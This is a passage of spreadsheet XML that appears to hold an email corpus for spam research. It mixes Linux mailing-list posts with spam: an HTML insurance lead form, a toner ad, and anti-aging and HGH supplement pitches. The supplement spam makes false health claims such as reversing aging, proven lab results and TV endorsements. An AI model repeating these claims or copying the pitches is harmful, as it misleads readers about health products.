               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;br&gt;
             &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"4" =
 face=3D"Arial, Helvetica, sans-serif"&gt;Worksite Marketing&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"4" =
 face=3D"Arial, Helvetica, sans-serif"&gt;Individual Sales&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/spacer.gif" width=3D"240" =
 height=3D"1"&gt;&lt;/td&gt;
                 &lt;td width=3D"50%" align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/spacer.gif" width=3D"240" =
 height=3D"1"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2" face=3D"Verdana, =
 Arial, Helvetica, sans-serif"&gt;&amp;#149;&amp;nbsp;Guaranteed Issue for Groups of =
 25+&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2" face=3D"Verdana, =
 Arial, Helvetica, sans-serif"&gt;&amp;#149;&amp;nbsp;Up to $1,000,000 =
 maximum&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2" face=3D"Verdana, =
 Arial, Helvetica, sans-serif"&gt;&amp;#149;&amp;nbsp;Electronic =
 Enrollment&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2" face=3D"Verdana, =
 Arial, Helvetica, sans-serif"&gt;&amp;#149;&amp;nbsp;Simplified Issue up to =
 $100,000&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2" face=3D"Verdana, =
 Arial, Helvetica, sans-serif"&gt;&amp;#149;&amp;nbsp;Unlimited billing =
 options&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2" face=3D"Verdana, =
 Arial, Helvetica, sans-serif"&gt;&amp;#149;&amp;nbsp;Up to 75% advance&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/20020514-7.gif" width=3D"535" =
 height=3D"57" alt=3D"Don't forget to ask about our matching retirement =
 plan!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;
             To learn more, please call us today!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/ntl/20020514-3big.gif" =
 width=3D"530" height=3D"64" alt=3D"800-626-7980"&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;/b&gt;&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;&lt;b&gt;=20
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt; &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#CCCCCC"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"6" align=3D"center"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"5"&gt; &lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Address:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"5"&gt; &lt;input type=3D"text" =
 name=3D"address" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"29%"&gt; &lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"14%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"9%"&gt; &lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                         &lt;td width=3D"12%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Zip:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"23%"&gt; &lt;input type=3D"text" =
 name=3D"zip" size=3D"5"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"5"&gt;&lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"5"&gt;&lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td align=3D"right" width=3D"13%"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Area of Interest:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"Worksite"&gt;
                           Worksite&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=20
                           &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"Individual"&gt;
                           Individual Sales &lt;/b&gt;&lt;/font&gt; &lt;/td&gt;
                         &lt;td colspan=3D"2"&gt; =20
                           &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"Both"&gt;
                           &lt;b&gt;&lt;font size=3D"2"&gt;Both &lt;/font&gt;&lt;/b&gt;=20
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"Agent"&gt;
                           Personal Producer&amp;nbsp; &amp;nbsp;&amp;nbsp;=20
                           &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"Manager"&gt;
                           Manager &lt;/b&gt;&lt;/font&gt; &lt;/td&gt;
                         &lt;td colspan=3D"2"&gt; =20
                           &lt;input type=3D"text" name=3D"NumOfAgents" =
 size=3D"2"&gt;
                           &lt;b&gt;&lt;font size=3D"2"&gt;Number of Agents =
 &lt;/font&gt;&lt;/b&gt;=20
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle" width=3D"23%"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" =
 width=3D"43" height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"29%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"marketing@ntlmail.com"&gt;=20
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"NTL Ad Inquiry"&gt;=20
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/b&gt;&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/20020514-4.gif" width=3D"128" =
 height=3D"109" alt=3D"National Traveler's Life Co."&gt;&lt;/td&gt;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href=3D"http://www.Insuranceiq.com/optout/"&gt;=20
         http://www.Insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_428CD_01C24DE6.6DD2E5F0--
</t>
  </si>
  <si>
    <t xml:space="preserve">I have failed dependencies in RPM database to I am unable to use
 apt-get.  I requests to run 'apt-get -f install' to fix these
 dependencies, however, I get these errors when running 'apt-get -f
 install' :
 [root@localhost root]# apt-get -f install
 Processing File Dependencies... Done
 Reading Package Lists... Done       
 Building Dependency Tree... Done
 Correcting dependencies... Done
 The following extra packages will be installed:
   libgcj 
 The following NEW packages will be installed:
   libgcj 
 0 packages upgraded, 1 newly installed, 0 to remove(replace) and 68 not
 upgraded.
 Need to get 2407kB of archives. After unpacking 8598kB will be used.
 Do you want to continue? [Y/n] Y
 Get:1 http://apt-rpm.tuxfamily.org redhat-7.2-i386/redhat/os libgcj
 2.96-27 [2407kB]
 Fetched 2407kB in 22s
 (105kB/s)                                                                                                                         
 Executing RPM (-U)...
 Preparing...                ###########################################
 [100%]
    1:libgcj                 error: unpacking of archive failed on file
 /usr/share/libgcj.zip;3c5b5e75: cpio: MD5 sum mismatch
 E: Sub-process /bin/rpm returned an error code (1)
 [root@localhost root]# 
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I ususally disconnect the internal speaker - thats pretty sure to stop any
 beeping!
 G.
 ___________________________
  Graham Smith,
  Network Administrator,
  Department of Computing,
  Institute of Technology,
  Tallaght, Dublin 24
  Phone: + 353 (01) 4042840
 -----Original Message-----
 From: ibhear [mailto:eibhear.geo@yahoo.com]
 Sent: 12 August 2002 16:49
 To: ibhear; Padraig Brady; ilug@linux.ie
 Subject: Re: [ILUG] I hate noise!
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Test Test ignore &lt;eom&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 John Hall
 13464 95th Ave NE
 Kirkland WA 98034
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Rohit
 &gt; Khare
 &gt; Sent: Monday, August 19, 2002 3:04 PM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: POLICY CHANGE: subscriber-only posting
 &gt; 
 &gt; Sorry, gang, but I've flipped the switch. If your posting address
 &gt; doesn't match your subscription address, or if you've instructed a
 robot
 &gt; to forkpost on your behalf, it'll get held, silently, for me or Kragen
 &gt; to review. Which will be rarely, so be warned.
 &gt; 
 &gt; Let's see how this works out for a week or so...
 &gt; 
 &gt; Rohit
 &gt; 
 &gt; ---
 &gt; My permanent email address is khare@alumni.caltech.edu
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Googlecooking
</t>
  </si>
  <si>
    <t xml:space="preserve">Originally linked by Dave's Scripting News:
 http://www.megnut.com/archive.asp?which=2002_09_01_archive.inc#000194
 We've got Googlewhacking, Googlebombing and now we can add Googlecooking to
 our lexicon. My mother types whatever ingredients she has on hand into
 Google and then picks the most appealing recipe returned in the results.
 What a good idea!
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_1547759024P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  "J. W. Ballantine" &lt;jwb@homer.att.com&gt;
 &gt; Date:  Wed, 21 Aug 2002 09:51:31 -0400
 &gt;
 &gt; I CVS'ed the unseen/Sequences changes and installed them, and have only one 
 &gt; real issue.
 &gt; 
 &gt; I use the unseen window rather than the exmh icon, and with the new code
 &gt; I can't seem to be able to.  How many unseen when when I have the main window open
 &gt; is not really necessary.
 hmmm, I stole the code from unseenwin, but I never tested it since I don't use 
 that functionality.  Consider it on my list of things to check.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_1547759024P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9ZPFAK9b4h5R0IUIRAkjyAJ4jjjhAVRx5FiwuCMa+QBWsbbE2jQCaAj4x
 NhIgYqnx9/1wvdSgesQhMIU=
 =vA3k
 -----END PGP SIGNATURE-----
 --==_Exmh_1547759024P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Grow Biologically Younger NOW ...5918899
</t>
  </si>
  <si>
    <t xml:space="preserve">Medial News -- Anti-Aging Breakthrough.
 Thousands Grow Biologically Younger. Proven by Laboratory Test Results.
 As announced on NBC News, Dateline NBC, 20/20, Oprah and many other news programs and talk shows, you can help slow the aging process by using the correct anti-aging products.
 90-day, 100-percent, money-back guarantee.
 New scientific medical breakthroughs are helping millions worldwide to improve their health to better defend against the most devastating affects and diseases of aging. This news is important to every person over 40 and affects every family.
 Now that you have heard the NEWS, are you still skeptical? You probably are thinking, "There's no fountain of youth". What if you're wrong and you can slow the signs of aging? Wouldn't you like to know for sure?
 You can slow the signs of aging, just like the movie stars and the "rich and famous".
 YES, YOU CAN HELP EXTEND THE PRIME OF LIFE.
 90-day, 100-percent, money-back guarantee.  
 MILLIONS OF CUSTOMERS
 Over 10 million of our supplements were consumed by our customers last year. That alone is proof that the products really work. We have thousands of testimonies from our customers stating how great the products work and how our customer's lives have changed because of them.
 You have seen the pain and anguish that your parents or grandparents suffered because of aging. Now, you don't have to suffer the same fate. You can slow the signs of again and help extend the prime of life. After 30 days, you can feel healthier... guaranteed.
 90-day, 100-percent, money-back guarantee
 LIFE CHANGING BENEFITS
 We have scientific evidence that proves you can slow the signs of again in the first 30 days, while feeling and seeing the following benefits: enhanced energy, strength and stamina; restored more youthful metabolism; lower levels of stress and body fat; support for your body's ability to restore, repair and rejuvenate; mental and physical performance support; improved outlook on life and much more.
 Click here and we will send you more info by e-mail.  mailto:agenomore301@netscape.net?subject=antiaging-info 
 You can also prove that the products are working with a simple at-home laboratory test. The products are backed by a 90-day, 100-percent, money-back guarantee.
 We would like you to participate in our FREE EVALUATION PROGRAM. This is a one-time-only offer. We must hear from you within 7 days of this e-mail date. 
 90-day, 100-percent, money-back guarantee.
 Click here and we will send you more info by e-mail.  mailto:agenomore301@netscape.net?subject=antiaging-info 
 Best Regards
 Jim Alston
 Anti-Aging Counselor 
 ******************************************************************************** 
 We apologize if you are not interested in learning more about how to grow younger, trim down and feel better. The Internet is the fastest method of distributing this type of timely information. If you wish to have your e-mail address deleted from our Better Health News e-mail database, DO NOT USE THE REPLY BUTTON. THE FROM ADDRESS DOES NOT GO TO OUR REMOVE DATABASE.
 Simply click here send an e-mail to: mailto:opt-out@soon.com?subject=remove
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Caching downloaded programs at gateway
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thursday 18 July 2002 14:49, Ray Kelly wrote:
 &gt; one basic option that I know of is Squidalyser, http://ababa.org/
 &gt; This doesn't do everything that you want but I've found
 &gt; it useful myself on a number of fronts
 &gt; Now it won't hive off things that have been downloaded but
 &gt; it your cache is so tuned and you've got the dick space you
 &gt; can keep some rather large objects in that.
 dick space?
 large objects?
 This is ILUG right?
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save you up to 70% on toner cartridges, Inkjet cartridges, and Ribbons!!!2
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0009_01C1EC40.AE23FA20
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Is your laser printer costing you more than you thought
 Is your laser printer, copier, fax, or Inkjet printer costing you more =
 than you thought?  Perhaps we can help !!
 We can save you up to 70% on toner cartridges, Inkjet cartridges, and =
 Ribbons that are stretching your budget.
 Just CLICK HERE for fast financial relief.=20
 REMOVAL INSTRUCTIONS: This message is sent in compliance with the =
 proposed BILL section 301, Paragraph (a) (2) (c) of S.1618. We obtain =
 our list data from a variety of online sources, including opt-in lists. =
 This email is sent by a direct email marketing firm on our behalf, and =
 if you would rather not receive any further information from us, please =
 CLICK HERE and simply hit "SEND" and you will be removed. In this way, =
 you will instantly "opt-out" from the list your email address was =
 obtained from, whether this was an "opt-in" or otherwise. Please accept =
 our apologies if this message has reached you in error. Allow up to 5-10 =
 business days for your email address to be removed from all lists in our =
 control. Meanwhile, simply delete any duplicate emails that you may =
 receive and rest assured that your request to be removed will be =
 honored. If you have previously requested to be Removed and are still =
 receiving this message, you may email our Abuse Control Center at CLICK =
 HERE or call us at 1-(888) 817-9902, or write to us at: Abuse Control =
 Center, 111 Pacifica #250, Irvine, CA 92618.=20
 Thank You=20
 tonerbestprice.net
 ------=_NextPart_000_0009_01C1EC40.AE23FA20
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Is your laser printer costing you more than you =
 thought&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Language content=3Den-us&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2715.400" name=3DGENERATOR&gt;
 &lt;META content=3DFrontPage.Editor.Document name=3DProgId&gt;
 &lt;STYLE fprolloverstyle&gt;A:hover {
 	FONT-WEIGHT: bold; FONT-SIZE: 12pt; COLOR: #ff0000; FONT-FAMILY: =
 Verdana
 }
 &lt;/STYLE&gt;
 &lt;BGSOUND balance=3D0 =
 src=3D"http://www.tonerbestprice.net/babyelephantwalk[1].mid"=20
 volume=3D-960 loop=3Dinfinite&gt;&lt;/HEAD&gt;
 &lt;BODY bgProperties=3Dfixed bgColor=3D#ffffff=20
 background=3Dhttp://www.tonerbestprice.net/denim1.gif&gt;
 &lt;P&gt;&lt;SPAN style=3D"LEFT: 401px; POSITION: absolute; TOP: =
 308px"&gt;&lt;/SPAN&gt;&lt;FONT=20
 face=3DArial size=3D2&gt;&lt;/FONT&gt;&lt;IMG style=3D"WIDTH: 238px; HEIGHT: 125px" =
 height=3D200=20
 src=3D"http://www.tonerbestprice.net/money.jpg" width=3D382 =
 border=3D0&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT face=3DArial color=3D#ff3300&gt;&lt;FONT =
 face=3DTahoma&gt;&lt;STRONG&gt;&lt;FONT=20
 color=3D#ffff00&gt;&lt;FONT size=3D4&gt;Is your laser printer, copier, fax, or =
 Inkjet printer=20
 costing you more than you thought?&amp;nbsp; Perhaps we can help !!&lt;BR&gt;We =
 can save=20
 you up to 70% on toner cartridges, Inkjet cartridges, and Ribbons that =
 are=20
 stretching your budget.&lt;BR&gt;Just&lt;/FONT&gt; &lt;/FONT&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;A=20
 href=3D"http://www.tonerbestprice.net/"&gt;&lt;FONT color=3D#ffffff&gt;&lt;FONT =
 face=3DTahoma=20
 size=3D4&gt;&lt;STRONG&gt;CLICK HERE&lt;/STRONG&gt;&lt;/FONT&gt; &lt;/FONT&gt;&lt;/A&gt;&lt;STRONG&gt;&lt;FONT =
 face=3DTahoma=20
 color=3D#ffff00 size=3D4&gt;for fast financial relief.&lt;/FONT&gt;&lt;/STRONG&gt; =
 &lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;IMG style=3D"WIDTH: 130px; HEIGHT: 65px" height=3D68=20
 src=3D"http://www.tonerbestprice.net/animoney1.gif" width=3D135 =
 border=3D2&gt;&lt;/P&gt;
 &lt;P&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;&lt;FONT face=3DArial&gt;&lt;FONT color=3D#ffffff size=3D1&gt;REMOVAL =
 INSTRUCTIONS: This=20
 message is sent in compliance with the proposed BILL section 301, =
 Paragraph (a)=20
 (2) (c) of S.1618. We obtain our list data from a variety of online =
 sources,=20
 including opt-in lists. This email is sent by a direct email marketing =
 firm on=20
 our behalf, and if you would rather not receive any further information =
 from us,=20
 please &lt;/FONT&gt;&lt;A =
 href=3D"mailto:remove1635@ahpcorp.com?subject=3DREMOVE"&gt;&lt;FONT=20
 color=3D#ff0000 size=3D1&gt;CLICK HERE&lt;/FONT&gt;&lt;/A&gt;&lt;FONT color=3D#ffffff =
 size=3D1&gt; and simply=20
 hit "SEND" and you will be removed. In this way, you will instantly =
 "opt-out"=20
 from the list your email address was obtained from, whether this was an =
 "opt-in"=20
 or otherwise. Please accept our apologies if this message has reached =
 you in=20
 error. Allow up to 5-10 business days for your email address to be =
 removed from=20
 all lists in our control. Meanwhile, simply delete any duplicate emails =
 that you=20
 may receive and rest assured that your request to be removed will be =
 honored. If=20
 you have previously requested to be Removed and are still receiving this =
 message, you may email our Abuse Control Center at &lt;/FONT&gt;&lt;A=20
 href=3D"mailto:remove1635@ahpcorp.com?subject=3DREMOVE"&gt;&lt;FONT =
 color=3D#ff0000=20
 size=3D1&gt;CLICK HERE&lt;/FONT&gt;&lt;/A&gt;&lt;FONT color=3D#ffffff size=3D1&gt; or call us =
 at 1-(888)=20
 817-9902, or write to us at: Abuse Control Center, 111 Pacifica #250, =
 Irvine, CA=20
 92618. &lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;&lt;FONT color=3D#ffffff&gt;Thank You =
 &lt;BR&gt;tonerbestprice.net&lt;/FONT&gt;&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0009_01C1EC40.AE23FA20--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Re: Other uses for SA?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Brian R. Melcer said:
 &gt;&gt; I've got spamassassin installed and tested on MacOS X 10.1.5,
 &gt;&gt; although there are issues with spamd still.  So in addition to
 &gt;&gt; looking for new and different uses for SA, I'd like to hear
 &gt;&gt; from folks using it under MacOS X.
 &gt;
 &gt; I just recently converted our SA setup to use Amavisd into our Postfix
 Amavisd or Amavisd-new? If the latter, you don't need spamd running, since
 amavisd-new calls SA functions directly.
 -- 
 PGP Fingerprint: 0AA8 DC47 CB63 AE3F C739 6BF9 9AB4 1EF6 5AA5 BCDF
 Member, LEAF Project &lt;http://leaf.sourceforge.net&gt;    AIM: MikeLeone
 Public Key - &lt;http://www.mike-leone.com/~turgon/turgon-public-key.asc&gt;
 Some days you're the pigeon; some days you're the statue.
 Random Thought:
 --------------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</si>
  <si>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[use Perl] Headlines for 2002-09-18
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Subscribe to The Perl Review
     posted by pudge on Tuesday September 17, @08:00 (links)
     http://use.perl.org/article.pl?sid=02/09/17/121210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</si>
  <si>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Help Your Body Regain Strength!! drsjc
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
    &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
    &lt;meta name="GENERATOR" content="Mozilla/4.77 [en] (Windows NT 5.0; U) [Netscape]"&gt;
    &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
    &lt;title&gt;Lose weight while building lean muscle mass&amp;nbsp; and reversing the
 ravages of aging all at once&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &amp;nbsp;
 &lt;center&gt;&lt;table BORDER WIDTH="52%" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="90%" BGCOLOR="#FFCC00"&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+2&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=10 CELLPADDING=0 COLS=1 WIDTH="100%" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%" BGCOLOR="#000000"&gt;
 &lt;center&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+2&gt;Human
 Growth Hormone Therapy&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+1&gt;Lose weight
 while building lean muscle mass&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+1&gt;&amp;nbsp;and
 reversing the ravages of aging all at once.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;p&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+0&gt;Remarkable discoveries
 about Human Growth Hormones (&lt;b&gt;HGH&lt;/b&gt;)&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Arial"&gt;&lt;font color="#FFFFFF"&gt;&lt;font size=+0&gt;are changing
 the way we think about aging and weight loss.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table WIDTH="442" BGCOLOR="#FFFFFF" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="229" HEIGHT="2"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;&lt;font size=+0&gt;Lose
 Weight&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;&lt;font size=+0&gt;Build
 Muscle Tone&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;font color="#000000"&gt;&lt;font size=+0&gt;Reverse
 Aging&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
